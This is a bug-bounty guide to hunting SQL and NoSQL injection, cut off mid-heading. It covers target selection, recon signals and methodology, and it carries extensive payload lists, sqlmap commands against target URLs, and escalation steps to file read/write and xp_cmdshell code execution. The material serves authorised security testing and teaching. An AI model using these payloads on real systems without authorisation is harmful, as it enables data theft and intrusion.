Crown Jewel Targets
SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.
Highest-value targets:
- SaaS platforms with multi-tenant databases — one injection can expose all customer data
- E-commerce/payment systems — PII, card data, transaction records
- Search endpoints — user-controlled input passed directly to queries (e.g., Rockstar Games
/search) - Analytics/tracking subdomains — often built fast, tested less (e.g.,
sctrack.email.uber.com.cn) - Third-party plugins on enterprise installs — WordPress plugins, CMS extensions running on corporate domains (Uber's Huge IT Video Gallery)
- Internal tooling exposed externally — Apache Airflow, GitHub Enterprise, admin dashboards
- NoSQL backends (MongoDB) — often overlooked, same injection class, different syntax
Asset types that pay most:
- Production APIs with
/search,/filter,/sort,/reportparameters - Subdomains with legacy stacks (
.cn,.co,.ioregional variants) - Self-hosted open-source tools (Airflow, GitLab, Jenkins) on bounty scope
- Email tracking and analytics infrastructure
Attack Surface Signals
URL patterns that suggest injectable parameters:
/search?q=
/filter?category=
/sort?by=&order=
/report?start_date=&end_date=
/api/v1/items?id=
/index.php?id=
/gallery?album_id=
/track?uid=&campaign=
?page=&limit=&offset=
Response header signals:
X-Powered-By: PHP— likely MySQL/PostgreSQL backendServer: Apache+ PHP — classic LAMP stackX-Powered-By: Express— possible MongoDB/NoSQL backend- Database error messages leaking in responses (MySQL, PostgreSQL, MSSQL error strings)
JavaScript patterns indicating dynamic query construction:
// Look for these in JS bundles
fetch(`/api/search?q=${userInput}`)
$.ajax({ url: '/filter?sort=' + param })
axios.get('/report?from=' + startDate + '&to=' + endDate)
Tech stack signals:
- WordPress sites with third-party plugins (check
/wp-content/plugins/) - Apache Airflow endpoints (
/admin/,/api/experimental/) - GitHub Enterprise (
/_graphql,/search,/api/v3/) - Node.js + MongoDB combinations (check for
$where,$regexin request bodies) - PHP applications returning verbose MySQL errors
Content-type signals for NoSQL:
Content-Type: application/jsonbodies with nested object parameters- Parameters accepting arrays:
param[]=valueor{"key": {"$gt": ""}}
Step-by-Step Hunting Methodology
-
Enumerate all input vectors — Use Burp Suite passive scan during normal app usage. Capture every parameter: GET, POST, JSON body, HTTP headers (User-Agent, Referer, X-Forwarded-For), cookies, path segments.
-
Identify the tech stack — Check response headers, error messages, job postings, Wappalyzer, BuiltWith. Determines which payloads to prioritize (MySQL vs PostgreSQL vs MongoDB).
-
Baseline the response — Note normal response length, status code, and response time for a clean request. This is your diff baseline.
-
Send error-based probes — Inject single quote
', double quote", backtick`, and observe for:- Database error messages (immediate confirmation)
- Response length change
- HTTP 500 errors
-
Test boolean-based blind — Send true/false conditions and compare responses:
param=1 AND 1=1vsparam=1 AND 1=2- If responses differ → likely injectable
-
Test time-based blind — When no visible difference exists:
- MySQL:
param=1 AND SLEEP(5) - PostgreSQL:
param=1; SELECT pg_sleep(5)-- - MSSQL:
param=1; WAITFOR DELAY '0:0:5'-- - Measure response time delta > 5 seconds = confirmed
- MySQL:
-
For NoSQL (MongoDB) — Test object injection via JSON body and PHP-style array params:
- Replace string value with
{"$gt": ""}in JSON - Try
param[$ne]=invalidin query strings
- Replace string value with
-
Automate confirmation — Run
sqlmapon confirmed candidates with--level=3 --risk=2to enumerate databases without manual effort. -
Escalate impact — Attempt:
UNION-based extraction (enumerate columns first)INFORMATION_SCHEMAdump- File read/write (
LOAD_FILE,INTO OUTFILE) if permissions allow - Stacked queries for RCE (MSSQL
xp_cmdshell)
-
Document the full chain — Capture Burp repeater request/response, sqlmap output, and proof of data extraction (non-sensitive fields only for report).
Payload & Detection Patterns
Initial Error-Based Probes:
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR 1=1--
' OR 1=1#
admin'--
Boolean-Based Blind:
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(version(),1,1)='5'--
1 AND (SELECT COUNT(*) FROM users) > 0--
Time-Based Blind:
-- MySQL
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
1 AND (SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
1; EXEC xp_cmdshell('ping -n 5 127.0.0.1')--
-- SQLite
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))))==1--
UNION-Based (enumerate columns first):
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10-- (find column count via error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
NoSQL Injection (MongoDB):
// JSON body injection
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "this.username == this.password"}
// Query string injection
username[$ne]=invalid&password[$ne]=invalid
username[$regex]=.*&password[$regex]=.*
PHP Hash/Array Injection:
# Replace scalar with array
param[key]=value
param[$gt]=0
param[$ne]=null
Grep patterns for JS source hunting:
# Find unsanitized query construction in JS
grep -r "query\s*+=" src/
grep -r "WHERE.*\+" src/
grep -r "\.find({" src/ | grep -v "sanitize\|escape"
grep -rE "db\.query\(.*\+" src/
curl time-based detection:
# Baseline
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test"
# Inject
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test' AND SLEEP(5)--"
# SQLMap quick scan
sqlmap -u "https://target.com/search?q=test" --dbs --level=3 --risk=2 --batch
# SQLMap with POST
sqlmap -u "https://target.com/api/filter" --data="category=electronics&sort=price" --dbs --batch
# SQLMap with cookie auth
sqlmap -u "https://target.com/admin/report" --cookie="session=TOKEN" --dbs --batch --level=5
Burp Intruder payload list for column enumeration:
§1§
§1§,§1§
§1§,§1§,§1§
§1§,§1§,§1§,§1§
Common Root Causes
-
String concatenation instead of parameterized queries — The #1 root cause. Developers build SQL strings with user input directly:
"SELECT * FROM items WHERE id=" + userId. -
ORMs bypassed for "performance" — Developer switches from safe ORM to raw query for complex joins or reports:
db.query("SELECT " + userColumn + " FROM table"). -
Search/filter functionality — Sorting and filtering logic is notoriously hard to parameterize (column names can't be bound), leading to allowlist bypasses or no protection at all.
-
Third-party plugin/library vulnerabilities — Developers trust installed plugins (WordPress, Joomla extensions) without auditing their query logic (Uber's Huge IT Video Gallery case).
-
Legacy codebases — Old PHP 4/5 code predating PDO/MySQLi prepared statements, still running in production on acquired assets or regional subdomains.
-
Internal tools promoted to external — Tools like Apache Airflow were designed for internal use with minimal security hardening, then exposed to authenticated external users.
-
**NoSQL